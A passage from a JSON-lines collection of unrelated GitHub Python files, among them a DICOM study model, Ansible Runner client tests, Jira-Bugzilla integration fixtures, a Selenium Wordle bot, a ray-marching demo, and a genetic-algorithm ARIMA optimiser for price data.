%s' % len(self.series)\n msg += suffix+'N instances\\t\\t: %s' % len(self.instances)\n elif file_format == 'json':\n return self.json()\n elif file_format == 'csv':\n data = []\n if data_level > 1:\n data.append(self.id)\n data.append(self.studyUID)\n if data_level > 0:\n data.append(self.patientID)\n data.append(self.dateStudy)\n data.append(self.institutionName)\n if data_level > 1:\n data.append(self.patient_id)\n data.append(len(self.series))\n data.append(len(self.instances))\n return ','.join(\n [csv_text_delimiter+str(d)+csv_text_delimiter for d in data])\n if output_console:\n print(msg)\n return msg\n\n @staticmethod\n def header(data_level):\n \"\"\"\n Return the header\n\n :param data_level: The level of displaying the header\n\n The possible value:\n\n - ``0`` - key\n - ``1`` - minimal\n - ``2`` - full\n\n :type 
data_level: int\n :return: The header\n :rtype: str\n \"\"\"\n head = []\n if data_level > 1:\n head.append('id')\n head.append('studyUID')\n if data_level > 0:\n head.append('patientID')\n head.append('dateStudy') # fix: was a duplicated 'patientID'; display() emits dateStudy in this position\n head.append('institutionName')\n if data_level > 1:\n head.append('patient_id')\n head.append('N series')\n head.append('N instances')\n return ','.join(['\"'+h+'\"' for h in head])+'\\n'\n","repo_name":"aphp/SPHERE","sub_path":"sphere/dicmeta/models/base_models/base_study_model.py","file_name":"base_study_model.py","file_ext":"py","file_size_in_byte":5523,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"33380674763","text":"import json\nfrom pathlib import Path\nimport sys\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LogNorm\nimport numpy as np\n\n\nif __name__ == '__main__':\n pictures_dir = Path('pictures/')\n\n try:\n _, filename = sys.argv\n except ValueError:\n print('You must specify filename',\n file=sys.stderr)\n exit(1)\n\n data = json.load(sys.stdin)\n fig, (ax1, ax2) = plt.subplots(nrows=1, ncols=2,\n figsize=(10, 4), dpi=200)\n\n t = np.array(list(map(lambda x: x['t'], data)), np.float64)\n x = np.array(data[0]['x'])\n\n density = np.array(\n list(map(lambda x: np.array(x['density'], np.float64), data)))\n pressure = np.array(\n list(map(lambda x: np.array(x['pressure'], np.float64), data)))\n\n density_map = ax1.imshow(\n density[::-1], interpolation='bilinear', norm=LogNorm(vmin=1e-11, vmax=1.5),\n extent=[min(x), max(x), min(t), max(t)], aspect='auto')\n plt.colorbar(density_map, ax=ax1)\n ax1.set_xlabel('Radius')\n ax1.set_ylabel('Density')\n\n pressure_map = ax2.imshow(\n pressure[::-1], interpolation='bilinear', norm=LogNorm(vmin=1e-11, vmax=1.5),\n extent=[min(x), max(x), min(t), max(t)], aspect='auto')\n plt.colorbar(pressure_map, ax=ax2)\n ax2.set_xlabel('Radius')\n ax2.set_ylabel('Pressure')\n\n plt.savefig(pictures_dir.joinpath(filename))\n","repo_name":"DABND19/riemann-solver","sub_path":"color_map.py","file_name":"color_map.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70101641850","text":"import logging\nimport unittest\nimport mock\nimport json\n\nimport requests_mock\n\nfrom requests.exceptions import ConnectionError\n\nfrom ..ansible_runner_svc import Client, PlayBookExecution, ExecutionStatusCode, \\\n API_URL, PLAYBOOK_EXEC_URL, \\\n PLAYBOOK_EVENTS, AnsibleRunnerServiceError\n\n\nSERVER_URL = \"ars:5001\"\nCERTIFICATE = \"\"\n\n# Playbook attributes\nPB_NAME = \"test_playbook\"\nPB_UUID = \"1733c3ac\"\n\n# Playbook execution data file\nPB_EVENTS_FILE = \"./tests/pb_execution_events.data\"\n\n# create console handler and set level to info\nlogger = logging.getLogger()\nhandler = logging.StreamHandler()\nhandler.setLevel(logging.INFO)\nformatter = logging.Formatter(\"%(levelname)s - %(message)s\")\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\ndef mock_get_pb(mock_server, playbook_name, return_code):\n\n ars_client = Client(SERVER_URL, verify_server=False, ca_bundle=\"\",\n client_cert = \"DUMMY_PATH\", client_key = \"DUMMY_PATH\",\n logger = logger)\n\n the_pb_url = \"https://%s/%s/%s\" % (SERVER_URL, PLAYBOOK_EXEC_URL, playbook_name)\n\n if return_code == 404:\n mock_server.register_uri(\"POST\",\n the_pb_url,\n json={ \"status\": \"NOTFOUND\",\n \"msg\": \"playbook file not found\",\n \"data\": {}},\n status_code=return_code)\n elif 
return_code == 202:\n mock_server.register_uri(\"POST\",\n the_pb_url,\n json={ \"status\": \"STARTED\",\n \"msg\": \"starting\",\n \"data\": { \"play_uuid\": \"1733c3ac\" }},\n status_code=return_code)\n\n return PlayBookExecution(ars_client, playbook_name, logger,\n result_pattern = \"RESULTS\")\n\nclass ARSclientTest(unittest.TestCase):\n\n def test_server_not_reachable(self):\n\n with self.assertRaises(AnsibleRunnerServiceError):\n ars_client = Client(SERVER_URL, verify_server=False, ca_bundle=\"\",\n client_cert = \"DUMMY_PATH\", client_key = \"DUMMY_PATH\",\n logger = logger)\n\n status = ars_client.is_operative()\n\n\n def test_server_connection_ok(self):\n\n with requests_mock.Mocker() as mock_server:\n\n ars_client = Client(SERVER_URL, verify_server=False, ca_bundle=\"\",\n client_cert = \"DUMMY_PATH\", client_key = \"DUMMY_PATH\",\n logger = logger)\n\n the_api_url = \"https://%s/%s\" % (SERVER_URL,API_URL)\n mock_server.register_uri(\"GET\",\n the_api_url,\n text=\"api\",\n status_code=200)\n\n self.assertTrue(ars_client.is_operative(),\n \"Operative attribute expected to be True\")\n\n def test_server_http_delete(self):\n\n with requests_mock.Mocker() as mock_server:\n\n ars_client = Client(SERVER_URL, verify_server=False, ca_bundle=\"\",\n client_cert = \"DUMMY_PATH\", client_key = \"DUMMY_PATH\",\n logger = logger)\n\n url = \"https://%s/test\" % (SERVER_URL)\n mock_server.register_uri(\"DELETE\",\n url,\n json={ \"status\": \"OK\",\n \"msg\": \"\",\n \"data\": {}},\n status_code=201)\n\n response = ars_client.http_delete(\"test\")\n self.assertTrue(response.status_code == 201)\n\nclass PlayBookExecutionTests(unittest.TestCase):\n\n\n def test_playbook_execution_ok(self):\n \"\"\"Check playbook id is set when the playbook is launched\n \"\"\"\n with requests_mock.Mocker() as mock_server:\n\n test_pb = mock_get_pb(mock_server, PB_NAME, 202)\n\n test_pb.launch()\n\n self.assertEqual(test_pb.play_uuid, PB_UUID,\n \"Found Unexpected playbook uuid\")\n\n def test_playbook_execution_error(self):\n \"\"\"Check playbook id is not set when the playbook is not present\n \"\"\"\n\n with requests_mock.Mocker() as mock_server:\n\n test_pb = mock_get_pb(mock_server, \"unknown_playbook\", 404)\n\n with self.assertRaises(AnsibleRunnerServiceError):\n test_pb.launch()\n\n #self.assertEqual(test_pb.play_uuid, \"\",\n # \"Playbook uuid not empty\")\n\n def test_playbook_not_launched(self):\n \"\"\"Check right status code when Playbook execution has not been launched\n \"\"\"\n\n with requests_mock.Mocker() as mock_server:\n\n test_pb = mock_get_pb(mock_server, PB_NAME, 202)\n\n # Check playbook not launched\n self.assertEqual(test_pb.get_status(),\n ExecutionStatusCode.NOT_LAUNCHED,\n \"Wrong status code for playbook not launched\")\n\n def test_playbook_launched(self):\n \"\"\"Check right status code when Playbook execution has been launched\n \"\"\"\n\n with requests_mock.Mocker() as mock_server:\n\n test_pb = mock_get_pb(mock_server, PB_NAME, 202)\n\n test_pb.launch()\n\n the_status_url = \"https://%s/%s/%s\" % (SERVER_URL,\n PLAYBOOK_EXEC_URL,\n PB_UUID)\n mock_server.register_uri(\"GET\",\n the_status_url,\n json={\"status\": \"OK\",\n \"msg\": \"running\",\n \"data\": {\"task\": \"Step 2\",\n \"last_task_num\": 6}\n },\n status_code=200)\n\n self.assertEqual(test_pb.get_status(),\n ExecutionStatusCode.ON_GOING,\n \"Wrong status code for a running playbook\")\n\n self.assertEqual(test_pb.play_uuid, PB_UUID,\n \"Unexpected playbook uuid\")\n\n def test_playbook_finish_ok(self):\n 
\"\"\"Check right status code when Playbook execution is succesful\n \"\"\"\n with requests_mock.Mocker() as mock_server:\n\n test_pb = mock_get_pb(mock_server, PB_NAME, 202)\n\n test_pb.launch()\n\n the_status_url = \"https://%s/%s/%s\" % (SERVER_URL,\n PLAYBOOK_EXEC_URL,\n PB_UUID)\n mock_server.register_uri(\"GET\",\n the_status_url,\n json={\"status\": \"OK\",\n \"msg\": \"successful\",\n \"data\": {}\n },\n status_code=200)\n\n self.assertEqual(test_pb.get_status(),\n ExecutionStatusCode.SUCCESS,\n \"Wrong status code for a playbook executed succesfully\")\n\n def test_playbook_finish_error(self):\n \"\"\"Check right status code when Playbook execution has failed\n \"\"\"\n with requests_mock.Mocker() as mock_server:\n\n test_pb = mock_get_pb(mock_server, PB_NAME, 202)\n\n test_pb.launch()\n\n the_status_url = \"https://%s/%s/%s\" % (SERVER_URL,\n PLAYBOOK_EXEC_URL,\n PB_UUID)\n mock_server.register_uri(\"GET\",\n the_status_url,\n json={\"status\": \"OK\",\n \"msg\": \"failed\",\n \"data\": {}\n },\n status_code=200)\n\n self.assertEqual(test_pb.get_status(),\n ExecutionStatusCode.ERROR,\n \"Wrong status code for a playbook with error\")\n\n def test_playbook_get_result(self):\n \"\"\" Find the right result event in a set of different events\n \"\"\"\n with requests_mock.Mocker() as mock_server:\n\n test_pb = mock_get_pb(mock_server, PB_NAME, 202)\n\n test_pb.launch()\n\n the_events_url = \"https://%s/%s\" % (SERVER_URL,\n PLAYBOOK_EVENTS % PB_UUID)\n\n # Get the events stored in a file\n pb_events = {}\n with open(PB_EVENTS_FILE) as events_file:\n pb_events = json.loads(events_file.read())\n\n mock_server.register_uri(\"GET\",\n the_events_url,\n json=pb_events,\n status_code=200)\n\n result = test_pb.get_result(\"runner_on_ok\")\n\n self.assertEqual(len(result.keys()), 1,\n \"Unique result event not found\")\n\n self.assertIn(\"37-100564f1-9fed-48c2-bd62-4ae8636dfcdb\",\n result.keys(),\n \"Predefined result event not found\")\n","repo_name":"OpenMPDK/KVCeph","sub_path":"src/pybind/mgr/ansible/tests/test_client_playbooks.py","file_name":"test_client_playbooks.py","file_ext":"py","file_size_in_byte":9456,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"77"} +{"seq_id":"36538038054","text":"\"\"\"\nModule for setting up pytest fixtures\n\"\"\"\nimport time\nfrom unittest import mock\n\nimport pytest\nimport responses\nfrom fastapi.testclient import TestClient\n\nfrom jbi import Operation\nfrom jbi.app import app\nfrom jbi.configuration import get_actions\nfrom jbi.environment import Settings\nfrom jbi.models import (\n Action,\n ActionContext,\n Actions,\n BugzillaWebhookComment,\n BugzillaWebhookRequest,\n)\nfrom jbi.services import bugzilla, jira\nfrom tests.fixtures import factories\n\n\n@pytest.fixture(autouse=True)\ndef mocked_statsd():\n with mock.patch(\"jbi.services.common.statsd\") as _mocked_statsd:\n yield _mocked_statsd\n\n\n@pytest.fixture\ndef anon_client():\n \"\"\"A test client with no authorization.\"\"\"\n return TestClient(app)\n\n\n@pytest.fixture\ndef settings():\n \"\"\"A test Settings object\"\"\"\n return Settings()\n\n\n@pytest.fixture(autouse=True)\ndef actions():\n get_actions.cache_clear()\n return get_actions()\n\n\n@pytest.fixture(autouse=True)\ndef mocked_bugzilla(request):\n if \"no_mocked_bugzilla\" in request.keywords:\n yield None\n bugzilla.get_client.cache_clear()\n else:\n with mock.patch(\"jbi.services.bugzilla.BugzillaClient\") as mocked_bz:\n yield mocked_bz()\n 
bugzilla.get_client.cache_clear()\n\n\n@pytest.fixture(autouse=True)\ndef mocked_jira(request):\n if \"no_mocked_jira\" in request.keywords:\n yield None\n jira.get_client.cache_clear()\n else:\n with mock.patch(\"jbi.services.jira.JiraClient\") as mocked_jira:\n yield mocked_jira()\n jira.get_client.cache_clear()\n\n\n@pytest.fixture\ndef mocked_responses():\n with responses.RequestsMock() as rsps:\n yield rsps\n\n\n@pytest.fixture\ndef context_create_example() -> ActionContext:\n return factories.action_context_factory(\n operation=Operation.CREATE,\n )\n\n\n@pytest.fixture\ndef context_update_example() -> ActionContext:\n bug = factories.bug_factory(\n see_also=[\"https://mozilla.atlassian.net/browse/JBI-234\"]\n )\n context = factories.action_context_factory(\n operation=Operation.UPDATE,\n bug=bug,\n jira=factories.jira_context_factory(issue=bug.extract_from_see_also()),\n )\n return context\n\n\n@pytest.fixture\ndef context_update_status_assignee() -> ActionContext:\n bug = factories.bug_factory(\n see_also=[\"https://mozilla.atlassian.net/browse/JBI-234\"]\n )\n changes = [\n {\n \"field\": \"status\",\n \"removed\": \"OPEN\",\n \"added\": \"FIXED\",\n },\n {\n \"field\": \"assignee\",\n \"removed\": \"nobody@mozilla.org\",\n \"added\": \"mathieu@mozilla.com\",\n },\n ]\n event = factories.webhook_event_factory(routing_key=\"bug.modify\", changes=changes)\n context = factories.action_context_factory(\n operation=Operation.UPDATE,\n bug=bug,\n event=event,\n jira=factories.jira_context_factory(issue=bug.extract_from_see_also()),\n )\n return context\n\n\n@pytest.fixture\ndef context_comment_example() -> ActionContext:\n user = factories.webhook_user_factory(login=\"mathieu@mozilla.org\")\n comment = BugzillaWebhookComment.parse_obj({\"number\": 2, \"body\": \"hello\"})\n bug = factories.bug_factory(\n see_also=[\"https://mozilla.atlassian.net/browse/JBI-234\"],\n comment=comment,\n )\n event = factories.webhook_event_factory(target=\"comment\", user=user)\n context = factories.action_context_factory(\n operation=Operation.COMMENT,\n bug=bug,\n event=event,\n jira=factories.jira_context_factory(issue=bug.extract_from_see_also()),\n )\n return context\n\n\n@pytest.fixture\ndef context_update_resolution_example() -> ActionContext:\n bug = factories.bug_factory(\n see_also=[\"https://mozilla.atlassian.net/browse/JBI-234\"]\n )\n event = factories.webhook_event_factory(\n action=\"modify\", routing_key=\"bug.modify:resolution\"\n )\n context = factories.action_context_factory(\n operation=Operation.UPDATE,\n bug=bug,\n event=event,\n jira=factories.jira_context_factory(issue=bug.extract_from_see_also()),\n )\n return context\n\n\n@pytest.fixture\ndef webhook_create_example() -> BugzillaWebhookRequest:\n webhook_payload = factories.webhook_factory()\n\n return webhook_payload\n\n\n@pytest.fixture\ndef webhook_comment_example() -> BugzillaWebhookRequest:\n user = factories.webhook_user_factory(login=\"mathieu@mozilla.org\")\n comment = BugzillaWebhookComment.parse_obj({\"number\": 2, \"body\": \"hello\"})\n bug = factories.bug_factory(\n see_also=[\"https://mozilla.atlassian.net/browse/JBI-234\"],\n comment=comment,\n )\n event = factories.webhook_event_factory(target=\"comment\", user=user)\n webhook_payload = factories.webhook_factory(bug=bug, event=event)\n\n return webhook_payload\n\n\n@pytest.fixture\ndef webhook_private_comment_example() -> BugzillaWebhookRequest:\n user = factories.webhook_user_factory(login=\"mathieu@mozilla.org\")\n event = 
factories.webhook_event_factory(target=\"comment\", user=user)\n bug = factories.bug_factory(\n comment={\"id\": 344, \"number\": 2, \"is_private\": True},\n see_also=[\"https://mozilla.atlassian.net/browse/JBI-234\"],\n )\n webhook_payload = factories.webhook_factory(bug=bug, event=event)\n return webhook_payload\n\n\n@pytest.fixture\ndef webhook_create_private_example() -> BugzillaWebhookRequest:\n return factories.webhook_factory(\n event=factories.webhook_event_factory(),\n bug={\"id\": 654321, \"is_private\": True},\n )\n\n\n@pytest.fixture\ndef webhook_change_status_assignee():\n changes = [\n {\n \"field\": \"status\",\n \"removed\": \"OPEN\",\n \"added\": \"FIXED\",\n },\n {\n \"field\": \"assignee\",\n \"removed\": \"nobody@mozilla.org\",\n \"added\": \"mathieu@mozilla.com\",\n },\n ]\n event = factories.webhook_event_factory(routing_key=\"bug.modify\", changes=changes)\n webhook_payload = factories.webhook_factory(event=event)\n return webhook_payload\n\n\n@pytest.fixture\ndef webhook_modify_private_example() -> BugzillaWebhookRequest:\n event = factories.webhook_event_factory(\n action=\"modify\", routing_key=\"bug.modify:status\"\n )\n webhook_payload = factories.webhook_factory(\n bug={\"id\": 654321, \"is_private\": True}, event=event\n )\n return webhook_payload\n\n\n@pytest.fixture\ndef action_factory() -> Action:\n return factories.action_factory\n\n\n@pytest.fixture\ndef action_example() -> Action:\n return factories.action_factory()\n\n\n@pytest.fixture\ndef actions_example(action_example) -> Actions:\n return Actions.parse_obj([action_example])\n\n\n@pytest.fixture(autouse=True)\ndef sleepless(monkeypatch):\n # https://stackoverflow.com/a/54829577\n monkeypatch.setattr(time, \"sleep\", lambda s: None)\n\n\n@pytest.fixture\ndef exclude_middleware():\n # Hack to work around issue with Starlette issue on Jinja templates\n # https://github.com/encode/starlette/issues/472#issuecomment-704188037\n user_middleware = app.user_middleware.copy()\n app.user_middleware = []\n app.middleware_stack = app.build_middleware_stack()\n yield\n app.user_middleware = user_middleware\n app.middleware_stack = app.build_middleware_stack()\n","repo_name":"grahamalama/jira-bugzilla-integration","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":7281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"29079587924","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.common.keys import Keys\nimport time\nimport worle_solver\n\noptions = webdriver.ChromeOptions()\noptions.add_experimental_option('excludeSwitches', ['enable-logging'])\nbrowser = webdriver.Chrome(options=options, service=Service(ChromeDriverManager().install()))\n\n\n###########################################################\n# GGGGG L OOOO BBBB AAA L\n# G L O O B B A A L\n# G L O O BBBBB A A L\n# G GG L O O B B AAAAA L\n# G G L O O B B A A L\n# GGGGG LLLLLL OOOO BBBBB A A LLLLLL\n###########################################################\n\ntron = worle_solver.solver()\n\n# [*tron.getGuess()]\n\nxbase = '/html/body/div/div[1]/div/div[row]'\n\n###########################################################\n\n\ndef send_word(word):\n\n ActionChains(browser) \\\n 
.send_keys(word) \\\n .key_down(Keys.ENTER) \\\n .key_up(Keys.ENTER) \\\n .perform()\n time.sleep(2)\n\n return\n\ndef check(row): #eliminates absent letters from letters[], does nothing to correct letters, and returns a dictionary of 'present' letters with indexes\n\n path = '/html/body/div/div[1]/div/div[' + str(row) + ']/div[BUTTON]/div'\n\n #checks data-state's of each letter\n for i in range (0, 5):\n\n buttonpath = path.replace('BUTTON', str(i+1)) #i+1 because html xpath div's are 1 indexed\n\n state = browser.find_element(By.XPATH, buttonpath).get_attribute('data-state')\n\n if state == 'absent':\n tron.setGuess('tests')\n elif state == 'present':\n continue #temp\n elif state == 'correct':\n continue #temp\n \n #return \n\ndef solve(row = 1): #will probably be done recursively,\n\n if (row > 6): #base case, row will be incremented from 1 to 7 and at 7 will return\n print('bruh')\n return\n else:\n \n #rowpath = By.XPATH(xbase.replace('row', str(row)))\n\n word_string = \"\"\n\n\n #because for some reason python string .join(letters) was returning blank\n #for i in [*tron.getGuess()]: \n # word_string += i\n\n print(tron.getGuess())\n send_word(tron.getGuess())\n #present = check(row)\n #print(present)\n check(row)\n \n row+=1\n\n solve(row)\n \n \n\n\n\n\n\n\n\n\n\ndef script():\n \n #path only needed to check letter correctness\n\n #html/body/whole site/board container/whole board/single row/single letter box\n\n browser.get('https://www.nytimes.com/games/wordle/index.html')\n\n time.sleep(1)\n\n xButton = browser.find_element(By.XPATH, '/html/body/div/div[3]/div/div')\n\n xButton.click()\n\n time.sleep(1)\n\n solve()\n\nscript()","repo_name":"SouthUniform7/wordLEbot","sub_path":"worLE.py","file_name":"worLE.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15671393328","text":"import pygame\nfrom constants import *\nfrom math import cos, sin\nfrom utils import *\n\nclass Ray:\n def __init__(self, x, y, angle, color):\n self.position = [x, y]\n self.angle = angle\n self.color = color\n\n self.x_pos = 0\n self.y_pos = 0\n self.collisions = [] # fix: was misspelt 'collsions' (unused, but keep the name consistent)\n \n def March(self, obstacles, collisions, screen):\n counter = 0\n current_pos = self.position\n # Draw origin\n pygame.draw.circle(screen, ORANGE, self.position, 5)\n\n while counter < 100:\n record = 2000\n closest = None\n for obstacle in obstacles:\n distance = SignedDistance(current_pos, obstacle, obstacle.radius)\n if distance < record:\n record = distance\n closest = obstacle\n \n if record < 1:\n collisions.insert(0, (int(current_pos[0]), int(current_pos[1])) )\n break\n\n self.x_pos = current_pos[0] + cos(self.angle) * record # fix: these were assigned to self.x_position/self.y_position,\n self.y_pos = current_pos[1] + sin(self.angle) * record # but the draw and offScreen calls below read self.x_pos/self.y_pos (which stayed at 0)\n\n aX = self.x_pos # reuse the values instead of recomputing the same expressions\n aY = self.y_pos\n\n pygame.draw.circle(screen, GREEN, (int(current_pos[0]), int(current_pos[1])), abs(int(record)), 1)\n pygame.draw.line(screen, self.color, (self.position[0], self.position[1]), (aX, aY), 4)\n\n current_pos[0] = aX\n current_pos[1] = aY\n\n pygame.draw.circle(screen, self.color, (int(self.x_pos), int(self.y_pos)), 4)\n\n closest.draw(screen, LIGHT_ORANGE)\n\n if offScreen([self.x_pos, self.y_pos], WIDTH, HEIGHT):\n break\n if offScreen(current_pos, WIDTH, HEIGHT):\n break\n \n counter += 
1\n\n","repo_name":"Josephbakulikira/24-project-with-pygame---for-beginners","sub_path":"29-2DRaymarching/ray.py","file_name":"ray.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"27883379957","text":"def binary(numbers, target):\n first = 0\n last = len(numbers)-1\n found = False\n\n while(first <= last and not found):\n mid = (first + last)//2\n if numbers[mid] == target:\n found = True\n else:\n if target < numbers[mid]:\n last = mid-1\n else:\n first = mid+1\n \n return found","repo_name":"winarcooo/DSA-Learning","sub_path":"binarysearch/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1006992782","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 9 20:34:44 2021\n\nHay que ejecutar cada función por separado primero y luego llamar a la función, si no se hace así dará un error en ajusta_y_predice_1.\n\n@author: Usuario\n\"\"\"\n\n# Librerías\n\n# Numpy\nimport numpy as np \n# Matplotlib\nimport matplotlib.pyplot as plt\n# Pandas\nimport pandas as pd \n# Statsmodels\nfrom statsmodels.tsa.arima.model import ARIMA\n# Yfinance\nimport yfinance as yf \n# Plotly\n#import plotly.graph_objects as go\n\n# Time\nimport time\n\n# Concurrent.futures\nfrom concurrent.futures import ThreadPoolExecutor\n\n# Genetic algorithms\n\nimport random\nfrom deap import base, creator, tools, algorithms\n\n# To locate the plots:\nfrom IPython import get_ipython\n\n# To accelerate the process:\n\ndef yf_data_ETL_7d1m(active_name): \n \n '''\n Le pasas el nombre del activo y extrae un dataset con los valores del mismo para cada minuto durante \n los últimos siete días. Ejemplos: 'EURUSD=X', 'BTC-USD', etc. Luego divide ese dataset en uno de \n entrenamiento y otro testeo.\n '''\n \n data = yf.download(tickers=active_name, period='7d', interval='1m', progress=False)\n df = pd.DataFrame(data=data)\n train_data, test_data = df[0:int(len(df)*0.8)], df[int(len(df)*0.8):]\n \n return df, train_data, test_data\n\ndef ajusta_y_predice1(history, p, d, q):\n model = ARIMA(history, order=(p,d,q)) # p (lags) = 5, d (grado de diferenciación: corresponde a las d diferencias que son necesarias para convertir la serie de datos original en una estacionaria) = 1, q (orden de medias móviles usado) = 0. Tengo que justificar los dos últimos parámetros.\n model_fit = model.fit() # Entrenamos el modelo. 
disp = False indica que no hay que devolver un mensaje con los parámetros del modelo para cada iteración.\n output = model_fit.forecast() # Predecimos los siguientes valores a partir del modelo entrenado.\n return output[0]\n\ndef transforma_binario_a_integer(individuo):\n numero_binario = '0b'+str(individuo).replace('[','').replace(']','').replace(',','').replace(' ','')\n return (int(numero_binario, 2)) # OJO CON ESTA LINEA QUE ES CLAVE!\n\n#print('El valor real para este momento fue: ', test_ar[0])\n#print('La predicción es: ', prediccion[0])\n\n# df, train_data, test_data = yf_data_ETL_7d1m('BTC-USD')\n\n\n\n\ndef optimiza_ARIMA_params(history, test_ar, poblacion = 32, prob_cruce = 0.5, prob_muta_ind = 0.4, prob_muta_gen = 0.4, torneo = 3): \n \n start_time = time.time()\n \n def evalOneMin(individuo):\n \n # global history\n # global test_ar\n \n pbin = individuo[:3]\n dbin = individuo[3:5]\n qbin = individuo[5:7]\n \n p = transforma_binario_a_integer(pbin)\n d = transforma_binario_a_integer(dbin)\n q = 2 #transforma_binario_a_integer(qbin)\n \n print(' p = ',p, ', d = ', d, ', q = ', q, '\\n\\t#-- Done --#')\n \n prediction = ajusta_y_predice1(history, p, d, q)\n \n dif_to_min = np.abs(test_ar[0] - prediction) # Lo doy en tanto por 1 para tener más claro la diferencia de partida que poner (1 es mucho en este caso, por ejemplo).\n # dif_to_min\n #best_dif = 1 # Partimos de que la predicción sea 2 veces tan grande como la observación, lo que es una diferencia bastante grande comparada con las predicciones que he visto al aplicar el método.\n # if dif_to_min < best_dif:\n # best_dif = dif_to_min\n \n return dif_to_min,\n \n # global history\n # global test_ar\n \n creator.create(\"FitnessMin\", base.Fitness, weights=(-1.0,)) # Observese que esto es un problema de minimizacion\n creator.create(\"Individual\", list, fitness=creator.FitnessMin) # Observese que esto es un problema de minimizacion\n \n toolbox = base.Toolbox()\n toolbox.register(\"attr_float\", random.randint, 0, 1)\n toolbox.register(\"individual\", tools.initRepeat, creator.Individual, toolbox.attr_float, n=7)\n toolbox.register(\"population\", tools.initRepeat, list, toolbox.individual)\n \n toolbox.register(\"evaluate\", evalOneMin) # Registrar aqui la funcion de evaluacion\n toolbox.register(\"mate\", tools.cxTwoPoint)\n toolbox.register(\"mutate\", tools.mutFlipBit, indpb=prob_muta_gen)\n toolbox.register(\"select\", tools.selTournament, tournsize=torneo)\n \n def main():\n \n global history\n global test_ar\n \n #import numpy\n \n pop = toolbox.population(n=poblacion) # Para 16 valores de p, 8 de d y 1 de q, hay 128 combinaciones posibles.\n hof = tools.HallOfFame(1)\n \n # with ThreadPoolExecutor(8) as exe:\n \n stats = tools.Statistics(lambda ind: ind.fitness.values)\n stats.register(\"avg\", np.mean)\n stats.register(\"min\", np.min)\n stats.register(\"max\", np.max)\n \n pop, logbook = algorithms.eaSimple(pop, toolbox, cxpb=prob_cruce, mutpb=prob_muta_ind, ngen=3, stats=stats, halloffame=hof, verbose=True)\n \n return pop, logbook, hof\n \n # if __name__ == \"__main__\":\n \n pop, log, hof = main()\n print(\"Best individual is: %s\\nwith fitness: %s\" % (hof[0], hof[0].fitness))\n print(\"El valor de p ha sido: \", transforma_binario_a_integer((hof[0])[0:3]))\n print(\"El valor de d ha sido: \", transforma_binario_a_integer((hof[0])[3:5]))\n print(\"El valor de q ha sido: \", 2) #transforma_binario_a_integer((hof[0])[5:7])\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n\n gen, avg, min_, max_ = 
log.select(\"gen\", \"avg\", \"min\", \"max\")\n \n get_ipython().run_line_magic('matplotlib', 'inline')\n plt.plot(gen, avg, label=\"average\")\n plt.plot(gen, min_, label=\"minimum\")\n plt.plot(gen, max_, label=\"maximum\")\n plt.xlabel(\"Generation\")\n plt.ylabel(\"Fitness\")\n plt.legend(loc=\"lower right\")\n plt.show()\n \n ind_usado = hof[0]\n \n return ind_usado, poblacion, prob_cruce, prob_muta_ind, prob_muta_gen, torneo,\\\n history, transforma_binario_a_integer((hof[0])[0:3]),\\\n transforma_binario_a_integer((hof[0])[3:5]), 2 #transforma_binario_a_integer((hof[0])[5:7])\n \n\n# ## Esta línea habría que cambiarla por la carga de datos desde SQL:\n# df = pd.read_csv(r'C:\\Users\\Usuario\\.spyder-py3\\Trabajo_Data_Science\\try1.csv')\n# ##\n\n# df.set_index('Datetime')\n# train_data, test_data = df[0:int(len(df)*0.8)], df[int(len(df)*0.8):]\n \n# train_ar = train_data['Open'].values\n# history = [x for x in train_ar]\n\n# # Creamos un array con los valores de testeo que vamos a usar:\n\n# test_ar = test_data['Open'].values \n\n# combina = optimiza_ARIMA_params(history, test_ar)\n# print(combina)\n\n # Es mejor no coger, a la vez, valores de p y de q mayores que 1. https://people.duke.edu/~rnau/411arim.htm\n \n # Combinaciones obtenidas para un dataset cambiante:\n \n # 6,2,0 128 ind 10 gen\n # 5,0,0 128 ind 10 gen\n # 14,3,0 64 ind 10 gen\n # 10,2,0 128 ind 5 gen\n # 8,1,0 64 ind 5 gen\n # 7,3,0 64 ind 5 gen\n # 3,2,0 64 ind 5 gen\n # 13,3,0 64 ind 5 gen \n # 11,3,0 64 ind 5 gen \n # 10,0,0 64 ind 5 gen \n \n # Combinaciones obtenidas para un dataset fijo: (64 ind, 5 gen, 0.5 cruce, 0.4 prob mutar un individuo, 0.4 prob mutar un gen) -- 12 min\n \n # 1,0,0 -- 2.100\n # 1,0,0 -- 2.100\n \n # Combinaciones obtenidas para un dataset fijo: (32 ind, 3 gen, 0.5 cruce, 0.4 prob mutar un individuo, 0.4 prob mutar un gen)\n \n # 1,0,0 -- 2.100\n # 1,0,0 -- 2.100 -- 211s || 256s -- SMAPE: 1.041 -- MSE: 2096.48\n # 12,1,0 -- 6.549 -- 237s || 256s -- SMAPE: 1.041 -- MSE: 2096.48 \n \n ","repo_name":"LMAFR/ARIMA_in_trading","sub_path":"ARIMA_optim_alggen.py","file_name":"ARIMA_optim_alggen.py","file_ext":"py","file_size_in_byte":7791,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70397775609","text":"from tkinter import LEFT, RIGHT, Toplevel, ttk, Text, messagebox\nfrom greenflare.widgets.windowhelper import center_on_parent\nimport 